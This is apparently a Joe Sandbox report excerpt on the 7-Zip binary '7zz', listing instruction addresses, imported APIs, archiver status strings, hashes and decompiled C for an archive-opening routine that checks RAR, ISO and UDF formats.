                                                                                  0x00404854
                                                                                  0x0040485b
                                                                                  0x00404860
                                                                                  0x00404867
                                                                                  0x00404875
                                                                                  0x00404897
                                                                                  0x00404897
                                                                                  0x0040489f
                                                                                  0x004048a5
                                                                                  0x004048af
                                                                                  0x004048ba
                                                                                  0x004048bf
                                                                                  0x004048c2
                                                                                  0x004048c6
                                                                                  0x004048cf
                                                                                  0x004048cf
                                                                                  0x00000000
                                                                                  0x004048c6
                                                                                  0x00404779
                                                                                  0x00000000
                                                                                  0x00404017
                                                                                  0x00404017
                                                                                  0x0040401e
                                                                                  0x004049dd
                                                                                  0x004049e4
                                                                                  0x004049eb
                                                                                  0x004049ec
                                                                                  0x004049ef
                                                                                  0x004049f5
                                                                                  0x004049fd
                                                                                  0x00404a06
                                                                                  0x00404a08
                                                                                  0x00404a0f
                                                                                  0x00404a16
                                                                                  0x00404a17
                                                                                  0x00404a1d
                                                                                  0x00404a22
                                                                                  0x00404a25
                                                                                  0x00404a30
                                                                                  0x00404a53
                                                                                  0x00404a5b
                                                                                  0x00404a5f
                                                                                  0x00404a64
                                                                                  0x00404a66
                                                                                  0x00404a6a
                                                                                  0x00404a6f
                                                                                  0x00404a6f
                                                                                  0x00404a75
                                                                                  0x00404a79
                                                                                  0x00404a7e
                                                                                  0x00404a7e
                                                                                  0x00404a7e
                                                                                  0x00404a88
                                                                                  0x00404a8d
                                                                                  0x00404a94
                                                                                  0x00000000
                                                                                  0x00404a27
                                                                                  0x00404a27
                                                                                  0x00404a2a
                                                                                  0x00404ab7
                                                                                  0x00404ab9
                                                                                  0x00000000
                                                                                  0x00404abf
                                                                                  0x00404abf
                                                                                  0x00404acb
                                                                                  0x00404ad0
                                                                                  0x00404ad2
                                                                                  0x00404ad4
                                                                                  0x00404ad7
                                                                                  0x00404ada
                                                                                  0x00404ae1
                                                                                  0x00404ae4
                                                                                  0x00404aea
                                                                                  0x00404aea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404a2a
                                                                                  0x00404024
                                                                                  0x0040402a
                                                                                  0x0040402f
                                                                                  0x00404031
                                                                                  0x00404502
                                                                                  0x00000000
                                                                                  0x00404037
                                                                                  0x00404037
                                                                                  0x0040403e
                                                                                  0x00404040
                                                                                  0x00404046
                                                                                  0x00404054
                                                                                  0x00404054
                                                                                  0x00404046
                                                                                  0x0040405f
                                                                                  0x00404064
                                                                                  0x0040406b
                                                                                  0x0040406f
                                                                                  0x00404075
                                                                                  0x00404085
                                                                                  0x00404085
                                                                                  0x00404085
                                                                                  0x00404085
                                                                                  0x00404077
                                                                                  0x00404077
                                                                                  0x0040407d
                                                                                  0x00000000
                                                                                  0x0040407f
                                                                                  0x0040407f
                                                                                  0x0040407f
                                                                                  0x0040407d
                                                                                  0x00404092
                                                                                  0x0040409f
                                                                                  0x004040aa
                                                                                  0x004040b5
                                                                                  0x004040bc
                                                                                  0x004040c5
                                                                                  0x004040c9
                                                                                  0x004040cf
                                                                                  0x004040e2
                                                                                  0x004040e2
                                                                                  0x004040e2
                                                                                  0x004040e2
                                                                                  0x004040d1
                                                                                  0x004040d1
                                                                                  0x004040d7
                                                                                  0x00000000
                                                                                  0x004040d9
                                                                                  0x004040d9
                                                                                  0x004040d9
                                                                                  0x004040d7
                                                                                  0x004040f6
                                                                                  0x00404108
                                                                                  0x0040410e
                                                                                  0x00404119
                                                                                  0x0040412a
                                                                                  0x0040412e
                                                                                  0x0040412f
                                                                                  0x00404130
                                                                                  0x00404134
                                                                                  0x00404139
                                                                                  0x0040413b
                                                                                  0x0040413d
                                                                                  0x00404147
                                                                                  0x0040414e
                                                                                  0x0040414e
                                                                                  0x00404159
                                                                                  0x0040415f
                                                                                  0x00404166
                                                                                  0x0040416d
                                                                                  0x00404174
                                                                                  0x00404177
                                                                                  0x0040417c
                                                                                  0x00404180
                                                                                  0x00404187
                                                                                  0x0040418a
                                                                                  0x0040418f
                                                                                  0x00404198
                                                                                  0x004041b4
                                                                                  0x004041b9
                                                                                  0x004041bf
                                                                                  0x004041c1
                                                                                  0x004041c3
                                                                                  0x004041c6
                                                                                  0x004041c8
                                                                                  0x004041ce
                                                                                  0x004041e2
                                                                                  0x004041f0
                                                                                  0x004041f3
                                                                                  0x004041fa
                                                                                  0x004041fe
                                                                                  0x00404209
                                                                                  0x0040420e
                                                                                  0x00404215
                                                                                  0x0040421a
                                                                                  0x0040421c
                                                                                  0x0040421c
                                                                                  0x004041c8
                                                                                  0x00404230
                                                                                  0x00404252
                                                                                  0x00404259
                                                                                  0x0040425a
                                                                                  0x0040425d
                                                                                  0x00404266
                                                                                  0x00404266
                                                                                  0x0040426e
                                                                                  0x00404273
                                                                                  0x00404276
                                                                                  0x00404276
                                                                                  0x00404279
                                                                                  0x0040427d
                                                                                  0x00404283
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x00404290
                                                                                  0x00404293
                                                                                  0x00404298
                                                                                  0x0040429e
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042b3
                                                                                  0x004042bc
                                                                                  0x004042bc
                                                                                  0x004042c1
                                                                                  0x004042c7
                                                                                  0x004042d3
                                                                                  0x004042dc
                                                                                  0x004042dc
                                                                                  0x004042e1
                                                                                  0x004042e7
                                                                                  0x004042f3
                                                                                  0x004042fc
                                                                                  0x004042fc
                                                                                  0x00404301
                                                                                  0x00404307
                                                                                  0x00404309
                                                                                  0x0040430e
                                                                                  0x00404317
                                                                                  0x0040431b
                                                                                  0x00404320
                                                                                  0x00404327
                                                                                  0x00404331
                                                                                  0x00404331
                                                                                  0x00404336
                                                                                  0x00404339
                                                                                  0x0040433b
                                                                                  0x00404340
                                                                                  0x0040434c
                                                                                  0x0040434c
                                                                                  0x00404360
                                                                                  0x00404360
                                                                                  0x00404365
                                                                                  0x0040436b
                                                                                  0x0040436d
                                                                                  0x00404370
                                                                                  0x0040439b
                                                                                  0x004043b7
                                                                                  0x004043bc
                                                                                  0x004043be
                                                                                  0x004043c1
                                                                                  0x004043c3
                                                                                  0x004043c9
                                                                                  0x004043dd
                                                                                  0x004043ee
                                                                                  0x004043f1
                                                                                  0x004043f8
                                                                                  0x004043fc
                                                                                  0x00404407
                                                                                  0x0040440c
                                                                                  0x00404416
                                                                                  0x0040441b
                                                                                  0x0040441d
                                                                                  0x0040441d
                                                                                  0x004043c3
                                                                                  0x00404431
                                                                                  0x00404453
                                                                                  0x0040445a
                                                                                  0x0040445b
                                                                                  0x0040445e
                                                                                  0x00404467
                                                                                  0x00404467
                                                                                  0x0040446f
                                                                                  0x00404474
                                                                                  0x00404477
                                                                                  0x00404372
                                                                                  0x00404372
                                                                                  0x00404378
                                                                                  0x0040438e
                                                                                  0x0040438e
                                                                                  0x00404378
                                                                                  0x00404480
                                                                                  0x00404484
                                                                                  0x0040448f
                                                                                  0x00404493
                                                                                  0x0040449e
                                                                                  0x004044a4
                                                                                  0x004044ab
                                                                                  0x004044b0
                                                                                  0x004044b2
                                                                                  0x004044b6
                                                                                  0x004044bb
                                                                                  0x004044bb
                                                                                  0x004044c1
                                                                                  0x004044c5
                                                                                  0x004044ca
                                                                                  0x004044d4
                                                                                  0x004044d9
                                                                                  0x004044e3
                                                                                  0x004044ea
                                                                                  0x004044ef
                                                                                  0x004044f6
                                                                                  0x004044fb
                                                                                  0x004044fb
                                                                                  0x00000000
                                                                                  0x00404031
                                                                                  0x0040401e
                                                                                  0x00403ed9
                                                                                  0x00403ee4
                                                                                  0x00403ee9
                                                                                  0x00403ee9
                                                                                  0x00403eec
                                                                                  0x00403ef2
                                                                                  0x00403ef8
                                                                                  0x00403efa
                                                                                  0x00403f00
                                                                                  0x00403f96
                                                                                  0x00403f96
                                                                                  0x00403f9b
                                                                                  0x00403f9d
                                                                                  0x00000000
                                                                                  0x00403fa3
                                                                                  0x00403fa3
                                                                                  0x00403fa6
                                                                                  0x00403ffc
                                                                                  0x00404008
                                                                                  0x00000000
                                                                                  0x00403fa8
                                                                                  0x00403faf
                                                                                  0x00403fb7
                                                                                  0x00403fbb
                                                                                  0x00403fc0
                                                                                  0x00403fc2
                                                                                  0x00403fc6
                                                                                  0x00403fcb
                                                                                  0x00403fcb
                                                                                  0x00403fd1
                                                                                  0x00403fd5
                                                                                  0x00403fda
                                                                                  0x00403fe4
                                                                                  0x00403fe9
                                                                                  0x00403ff0
                                                                                  0x00404a9b
                                                                                  0x00404a9e
                                                                                  0x00404aa3
                                                                                  0x00404aaa
                                                                                  0x00404ab1
                                                                                  0x00000000
                                                                                  0x00404ab1
                                                                                  0x00403fa6
                                                                                  0x00403f06
                                                                                  0x00403f06
                                                                                  0x00403f0b
                                                                                  0x00403f0d
                                                                                  0x00404507
                                                                                  0x0040450a
                                                                                  0x0040450e
                                                                                  0x00404513
                                                                                  0x00404516
                                                                                  0x0040451a
                                                                                  0x0040451c
                                                                                  0x00404521
                                                                                  0x00404521
                                                                                  0x00404527
                                                                                  0x0040452b
                                                                                  0x00404530
                                                                                  0x0040453a
                                                                                  0x0040453f
                                                                                  0x00404549
                                                                                  0x00404550
                                                                                  0x00404555
                                                                                  0x0040455c
                                                                                  0x00404561
                                                                                  0x00404561
                                                                                  0x00000000
                                                                                  0x00403f13
                                                                                  0x00403f13
                                                                                  0x00403f16
                                                                                  0x00403f85
                                                                                  0x00403f91
                                                                                  0x00000000
                                                                                  0x00403f18
                                                                                  0x00403f1f
                                                                                  0x00403f27
                                                                                  0x00403f2b
                                                                                  0x00403f30
                                                                                  0x00403f32
                                                                                  0x00403f36
                                                                                  0x00403f3b
                                                                                  0x00403f3b
                                                                                  0x00403f41
                                                                                  0x00403f45
                                                                                  0x00403f4a
                                                                                  0x00403f4a
                                                                                  0x00403f4a
                                                                                  0x00403f54
                                                                                  0x00403f59
                                                                                  0x00403f62
                                                                                  0x00403f69
                                                                                  0x00000000
                                                                                  0x00403f69
                                                                                  0x00403f16
                                                                                  0x00403f0d
                                                                                  0x00403f00
                                                                                  0x00403c9b
                                                                                  0x00403cb7
                                                                                  0x00403cbc
                                                                                  0x00403cbf
                                                                                  0x00403cc3
                                                                                  0x00403cc5
                                                                                  0x00403ccb
                                                                                  0x00403cd9
                                                                                  0x00403cde
                                                                                  0x00403ce7
                                                                                  0x00403cec
                                                                                  0x00403cfc
                                                                                  0x00403d01
                                                                                  0x00403d12
                                                                                  0x00403d1e
                                                                                  0x00403d23
                                                                                  0x00403d2a
                                                                                  0x00403d36
                                                                                  0x00403d42
                                                                                  0x00403d45
                                                                                  0x00403d48
                                                                                  0x00403d4b
                                                                                  0x00403d50
                                                                                  0x00403d54
                                                                                  0x00403d58
                                                                                  0x00403d5c
                                                                                  0x00403d5e
                                                                                  0x00403d6b
                                                                                  0x00403d6e
                                                                                  0x00403d76
                                                                                  0x00403d7a
                                                                                  0x00403d84
                                                                                  0x00403d8f
                                                                                  0x00403d93
                                                                                  0x00403d9d
                                                                                  0x00403d9d
                                                                                  0x00403da7
                                                                                  0x00403dac
                                                                                  0x00403db2
                                                                                  0x00403db2
                                                                                  0x00403d5e
                                                                                  0x00403dbe
                                                                                  0x00403dca
                                                                                  0x00403dcf
                                                                                  0x00403dd3
                                                                                  0x00403dd7
                                                                                  0x00403dd9
                                                                                  0x00403ddf
                                                                                  0x00403de2
                                                                                  0x00403de4
                                                                                  0x00403de7
                                                                                  0x00403df2
                                                                                  0x00403df2
                                                                                  0x00403df5
                                                                                  0x00403df7
                                                                                  0x00403dfa
                                                                                  0x00403e01
                                                                                  0x00403e01
                                                                                  0x00403dfc
                                                                                  0x00403dfc
                                                                                  0x00403dfc
                                                                                  0x00403e07
                                                                                  0x00403e0f
                                                                                  0x00403e11
                                                                                  0x00403e13
                                                                                  0x00403e16
                                                                                  0x00403e1d
                                                                                  0x00403e1d
                                                                                  0x00403e18
                                                                                  0x00403e18
                                                                                  0x00403e18
                                                                                  0x00403e20
                                                                                  0x00403de9
                                                                                  0x00403de9
                                                                                  0x00403deb
                                                                                  0x00000000
                                                                                  0x00403ded
                                                                                  0x00403ded
                                                                                  0x00403ded
                                                                                  0x00403deb
                                                                                  0x00403e23
                                                                                  0x00403e2c
                                                                                  0x00403e31
                                                                                  0x00403e37
                                                                                  0x00403e37
                                                                                  0x00403dd9
                                                                                  0x00403e3f
                                                                                  0x00403e44
                                                                                  0x00403e4b
                                                                                  0x00403e50
                                                                                  0x00403e53
                                                                                  0x00403e5a
                                                                                  0x00403e5a
                                                                                  0x00403ccb
                                                                                  0x00403e7a
                                                                                  0x00403e82
                                                                                  0x00403e86
                                                                                  0x00403e8b
                                                                                  0x00403e8e
                                                                                  0x00403e92
                                                                                  0x00403e94
                                                                                  0x00403e99
                                                                                  0x00403e99
                                                                                  0x00403e9f
                                                                                  0x00403ea3
                                                                                  0x00403ea8
                                                                                  0x00403eb2
                                                                                  0x00403eb7
                                                                                  0x00403ebe
                                                                                  0x00403ec5
                                                                                  0x00000000
                                                                                  0x00403ec5
                                                                                  0x00403b2c
                                                                                  0x00403b33
                                                                                  0x00403b3b
                                                                                  0x00403b3f
                                                                                  0x00403b44
                                                                                  0x00403b4e
                                                                                  0x00403b53
                                                                                  0x00403b56
                                                                                  0x00000000
                                                                                  0x00403b56
                                                                                  0x00403acf
                                                                                  0x00403ad6
                                                                                  0x00403adb
                                                                                  0x00403ade
                                                                                  0x00403f6a
                                                                                  0x00403f6d
                                                                                  0x00403f72
                                                                                  0x00403f79
                                                                                  0x00403f7e
                                                                                  0x00404563
                                                                                  0x00404569
                                                                                  0x00404571
                                                                                  0x00404571

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00403A75
                                                                                  • SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                                  • GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                                    • Part of subcall function 00406C53: __EH_prolog.LIBCMT ref: 00406C58
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                    • Part of subcall function 00407CEC: __EH_prolog.LIBCMT ref: 00407CF1
                                                                                    • Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E
                                                                                    • Part of subcall function 00405233: __EH_prolog.LIBCMT ref: 00405238
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ApisCommandExceptionFileLineRaise
                                                                                  • String ID: CRC Error$Decoding Error$Error:$ : $ file$----------------$59@$Archive Errors: $Archives: $CRC$CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
                                                                                  • API String ID: 3088770371-3134536549
                                                                                  • Opcode ID: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
                                                                                  • Instruction ID: 0e9785898952d904cddb7e6f0fb348193d980c7c6074724112ac217821b8bdc4
                                                                                  • Opcode Fuzzy Hash: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
                                                                                  • Instruction Fuzzy Hash: F0A28D70E042199ADF14EBA5C855BEEBBB4AF54308F1044BFE105B72C2DB785E84CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00417BAE Relevance: 23.5, APIs: 1, Strings: 12, Instructions: 710COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E00417BAE(intOrPtr __ecx) {
				intOrPtr* _t349;
				signed int _t353;
				intOrPtr _t355;
				void* _t356;
				signed int _t358;
				signed int _t359;
				signed int _t364;
				signed int _t371;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t384;
				signed int _t385;
				signed int _t391;
				void* _t393;
				signed int _t396;
				void* _t402;
				char* _t407;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t426;
				intOrPtr* _t428;
				void* _t433;
				void* _t437;
				signed int _t440;
				signed int _t441;
				signed int _t449;
				intOrPtr _t457;
				signed int _t462;
				intOrPtr _t463;
				intOrPtr _t465;
				void* _t472;
				intOrPtr _t479;
				signed int _t484;
				signed int _t486;
				void* _t489;
				signed int _t495;
				signed int _t496;
				intOrPtr _t498;
				signed int _t499;
				signed int _t500;
				char* _t502;
				intOrPtr _t536;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t582;
				void* _t587;
				intOrPtr _t591;
				signed int _t594;
				intOrPtr _t607;
				signed int _t619;
				signed int _t627;
				signed int _t629;
				char* _t641;
				signed char* _t645;
				intOrPtr _t647;
				signed int _t650;
				signed int _t652;
				intOrPtr _t653;
				void* _t657;
				void* _t659;
				intOrPtr _t660;
				signed int _t663;
				signed int _t666;
				void* _t667;
				void* _t669;
				intOrPtr* _t670;

				L0046B890(E00474DC3, _t667);
				_t670 = _t669 - 0x17c;
				_t647 = __ecx;
				_t641 = 0;
				 *((intOrPtr*)(_t667 - 0x74)) = __ecx;
				_t349 =  *((intOrPtr*)(__ecx));
				if(_t349 != 0) {
					 *((intOrPtr*)( *_t349 + 8))(_t349);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t647 + 0x34) = _t641;
				 *( *(_t647 + 0x30)) = _t641;
				E00408963(_t647 + 4);
				 *(_t667 - 4) = _t641;
				 *(_t667 - 0x48) = _t641;
				 *(_t667 - 0x44) = _t641;
				 *(_t667 - 0x40) = _t641;
				E00401E9A(_t667 - 0x48, 3);
				_t353 =  *(_t667 - 0x68);
				 *(_t667 - 4) = 1;
				if(_t353 == _t641) {
					L11:
					E00404AD0(_t667 - 0x34, 4);
					 *((intOrPtr*)(_t667 - 0x34)) = 0x47a668;
					__eflags =  *(_t667 + 0xc) - _t641;
					 *(_t667 - 4) = 3;
					if( *(_t667 + 0xc) < _t641) {
						_t355 =  *((intOrPtr*)(_t667 + 8));
						_t495 = 0;
						 *(_t667 + 0xc) = _t641;
						__eflags =  *((intOrPtr*)(_t355 + 0x10)) - _t641;
						if( *((intOrPtr*)(_t355 + 0x10)) <= _t641) {
							L18:
							__eflags =  *(_t667 + 0x10) - _t641;
							if( *(_t667 + 0x10) != _t641) {
								L21:
								__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
								if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
									L64:
									_t356 = E00408053( *(_t667 - 0x48), L"000");
									__eflags = _t356 - _t641;
									if(_t356 == _t641) {
										L66:
										 *(_t667 - 0x14) = _t641;
										 *(_t667 - 0x10) = _t641;
										 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
										 *(_t667 - 4) = 7;
										L0040FA26(_t667 - 0x18, 0x400);
										_t358 =  *(_t667 + 0x10);
										_t496 =  *(_t667 - 0x10);
										_t359 =  *((intOrPtr*)( *_t358 + 0x10))(_t358, _t641, _t641, _t641, _t641);
										__eflags = _t359 - _t641;
										if(_t359 != _t641) {
											L68:
											_t650 = _t359;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											L00407A18( *(_t667 - 0x10));
											L127:
											 *(_t667 - 4) = 1;
											E00408604(_t667 - 0x34);
											L00407A18( *(_t667 - 0x48));
											L00407A18( *((intOrPtr*)(_t667 - 0x6c)));
											_t364 = _t650;
											L33:
											 *[fs:0x0] =  *((intOrPtr*)(_t667 - 0xc));
											return _t364;
										}
										 *(_t667 + 0xc) = 0x400;
										_t359 = E0040FA74( *(_t667 + 0x10), _t496, _t667 + 0xc);
										__eflags = _t359 - _t641;
										if(_t359 == _t641) {
											__eflags =  *(_t667 + 0xc) - 0x10;
											if( *(_t667 + 0xc) < 0x10) {
												L80:
												 *(_t667 - 4) = 3;
												 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
												L00407A18( *(_t667 - 0x10));
												L81:
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
												if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
													L92:
													__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
													 *(_t667 - 0x20) = _t641;
													if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
														L32:
														 *(_t667 - 4) = 1;
														E00408604(_t667 - 0x34);
														L00407A18( *(_t667 - 0x48));
														L00407A18( *((intOrPtr*)(_t667 - 0x6c)));
														_t364 = 1;
														goto L33;
													}
													_t498 =  *((intOrPtr*)(_t667 - 0x74));
													__eflags = 0;
													do {
														_t652 =  *(_t667 + 0x10);
														__eflags = _t652;
														if(_t652 == 0) {
															L96:
															 *(_t667 + 0xc) = 0;
															 *(_t667 - 4) = 0xa;
															_t371 =  *( *(_t667 - 0x28) +  *(_t667 - 0x20) * 4);
															 *(_t498 + 0x1c) = _t371;
															E0040C9B4(_t667 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t371 * 4)) + 4))());
															_t375 =  *(_t667 + 0xc);
															__eflags = _t375;
															if(_t375 != 0) {
																__eflags = _t652;
																if(_t652 == 0) {
																	 *(_t667 - 0x3c) = 0;
																	 *(_t667 - 4) = 0xb;
																	 *((intOrPtr*)( *_t375))(_t375, 0x47a5b8, _t667 - 0x3c);
																	_t377 =  *(_t667 - 0x3c);
																	__eflags = _t377;
																	if(_t377 == 0) {
																		_t378 =  *(_t667 + 0xc);
																		 *(_t667 - 4) = 3;
																		__eflags = _t378;
																		if(_t378 != 0) {
																			 *((intOrPtr*)( *_t378 + 8))(_t378);
																		}
																		L111:
																		 *(_t667 - 4) = 1;
																		E00408604(_t667 - 0x34);
																		L00407A18( *(_t667 - 0x48));
																		L00407A18( *((intOrPtr*)(_t667 - 0x6c)));
																		_t364 = 0x80004001;
																		goto L33;
																	}
																	_t650 =  *((intOrPtr*)( *_t377 + 0xc))(_t377,  *((intOrPtr*)(_t667 + 0x14)));
																	_t384 =  *(_t667 - 0x3c);
																	__eflags = _t384;
																	 *(_t667 - 4) = 0xa;
																	if(_t384 != 0) {
																		 *((intOrPtr*)( *_t384 + 8))(_t384);
																	}
																	L103:
																	__eflags = _t650 - 1;
																	if(_t650 != 1) {
																		__eflags = _t650;
																		if(_t650 == 0) {
																			 *(_t667 - 0x1c) = 0;
																			 *((short*)(_t667 - 0x1a)) = 0;
																			_t385 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 0xc;
																			 *((intOrPtr*)( *_t385 + 0x20))(_t385, 0x37, _t667 - 0x1c);
																			__eflags =  *(_t667 - 0x1c);
																			if( *(_t667 - 0x1c) != 0) {
																				__eflags =  *(_t667 - 0x1c) - 8;
																				_t407 =  *(_t667 - 0x14);
																				if( *(_t667 - 0x1c) != 8) {
																					_t407 = L"Unknown error";
																				}
																				L00403593(_t498 + 0x30, _t407);
																			}
																			 *(_t667 - 4) = 0xa;
																			E0040C20F(_t667 - 0x1c);
																			E0040C9B4(_t498,  *(_t667 + 0xc));
																			_t653 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *(_t498 + 0x1c) * 4));
																			__eflags =  *(_t653 + 0x20);
																			if( *(_t653 + 0x20) != 0) {
																				_t391 = L0041761D(_t653, _t667 - 0x48);
																				__eflags = _t391;
																				if(_t391 < 0) {
																					_t391 = 0;
																					__eflags = 0;
																				}
																				_t536 =  *((intOrPtr*)(_t653 + 0x24));
																				_t335 =  *((intOrPtr*)(_t536 + _t391 * 4)) + 0xc; // 0xc
																				_push( *((intOrPtr*)(_t536 + _t391 * 4)));
																				_t393 = E00414F74(_t667 - 0x18, _t667 - 0x6c);
																				 *(_t667 - 4) = 0x10;
																				E00401E26(_t498 + 0x10, _t393);
																				L00407A18( *((intOrPtr*)(_t667 - 0x18)));
																			} else {
																				L00403532(_t667 - 0x60, 0x490a74);
																				 *(_t667 - 4) = 0xd;
																				L00403532(_t667 - 0x18, 0x490a74);
																				_push(_t667 - 0x60);
																				_push(_t667 - 0x18);
																				 *(_t667 - 4) = 0xe;
																				_t402 = E00414F74(_t667 - 0x54, _t667 - 0x6c);
																				 *(_t667 - 4) = 0xf;
																				E00401E26(_t498 + 0x10, _t402);
																				L00407A18( *((intOrPtr*)(_t667 - 0x54)));
																				L00407A18( *((intOrPtr*)(_t667 - 0x18)));
																				L00407A18( *((intOrPtr*)(_t667 - 0x60)));
																			}
																			_t396 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t396;
																			if(_t396 != 0) {
																				 *((intOrPtr*)( *_t396 + 8))(_t396);
																			}
																			_t650 = 0;
																			__eflags = 0;
																		} else {
																			_t409 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t409;
																			if(_t409 != 0) {
																				 *((intOrPtr*)( *_t409 + 8))(_t409);
																			}
																		}
																		goto L127;
																	}
																	_t411 =  *(_t667 + 0xc);
																	 *(_t667 - 4) = 3;
																	__eflags = _t411;
																	if(_t411 != 0) {
																		 *((intOrPtr*)( *_t411 + 8))(_t411);
																	}
																	goto L106;
																}
																_t650 =  *((intOrPtr*)( *_t375 + 0xc))(_t375,  *(_t667 + 0x10), 0x47ab88,  *((intOrPtr*)(_t667 + 0x18)));
																goto L103;
															}
															 *(_t667 - 4) = 3;
															goto L106;
														}
														_t414 =  *((intOrPtr*)( *_t652 + 0x10))(_t652, 0, 0, 0, 0);
														__eflags = _t414;
														if(_t414 != 0) {
															_t650 = _t414;
															goto L127;
														}
														goto L96;
														L106:
														 *(_t667 - 0x20) =  *(_t667 - 0x20) + 1;
														__eflags =  *(_t667 - 0x20) -  *((intOrPtr*)(_t667 - 0x2c));
													} while ( *(_t667 - 0x20) <  *((intOrPtr*)(_t667 - 0x2c)));
													goto L32;
												}
												L00403532(_t667 - 0x18, L"iso");
												 *(_t667 - 4) = 8;
												 *(_t667 - 0x38) = L00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												L00407A18( *((intOrPtr*)(_t667 - 0x18)));
												 *_t670 = L"udf";
												L00403532(_t667 - 0x18);
												 *(_t667 - 4) = 9;
												 *(_t667 - 0x4c) = L00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												L00407A18( *((intOrPtr*)(_t667 - 0x18)));
												_pop(_t555);
												_t619 = 0;
												_t556 = _t555 | 0xffffffff;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												_t426 = _t556;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L92;
												}
												 *(_t667 + 0xc) =  *(_t667 - 0x28);
												do {
													_t657 =  *( *(_t667 + 0xc));
													__eflags = _t657 -  *(_t667 - 0x38);
													if(_t657 ==  *(_t667 - 0x38)) {
														_t426 = _t619;
													}
													_t499 =  *(_t667 - 0x4c);
													__eflags = _t657 - _t499;
													if(_t657 == _t499) {
														_t556 = _t619;
													}
													 *(_t667 + 0xc) =  *(_t667 + 0xc) + 4;
													_t619 = _t619 + 1;
													__eflags = _t619 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t619 <  *((intOrPtr*)(_t667 - 0x2c)));
												__eflags = _t556 - _t426;
												if(_t556 > _t426) {
													__eflags = _t426 - _t641;
													if(_t426 >= _t641) {
														 *( *(_t667 - 0x28) + _t556 * 4) =  *(_t667 - 0x38);
														 *( *(_t667 - 0x28) + _t426 * 4) = _t499;
													}
												}
												goto L92;
											}
											 *(_t667 - 0x4a) =  *(_t667 - 0x4a) & 0x00000000;
											_t659 = 0;
											 *((char*)(_t667 - 0x50)) = 0x52;
											 *((char*)(_t667 - 0x4f)) = 0x61;
											 *((char*)(_t667 - 0x4e)) = 0x72;
											 *((char*)(_t667 - 0x4d)) = 0x21;
											 *(_t667 - 0x4c) = 0x1a;
											 *((char*)(_t667 - 0x4b)) = 7;
											_t559 = _t496 - _t667 - 0x50;
											__eflags = _t559;
											while(1) {
												_t428 = _t667 + _t659 - 0x50;
												__eflags =  *((intOrPtr*)(_t559 + _t428)) -  *_t428;
												if( *((intOrPtr*)(_t559 + _t428)) !=  *_t428) {
													goto L80;
												}
												_t659 = _t659 + 1;
												__eflags = _t659 - 7;
												if(_t659 < 7) {
													continue;
												}
												__eflags =  *((char*)(_t496 + 9)) - 0x73;
												if( *((char*)(_t496 + 9)) != 0x73) {
													goto L80;
												}
												__eflags =  *(_t496 + 0xa) & 0x00000001;
												if(( *(_t496 + 0xa) & 0x00000001) == 0) {
													goto L80;
												}
												_t500 = 0;
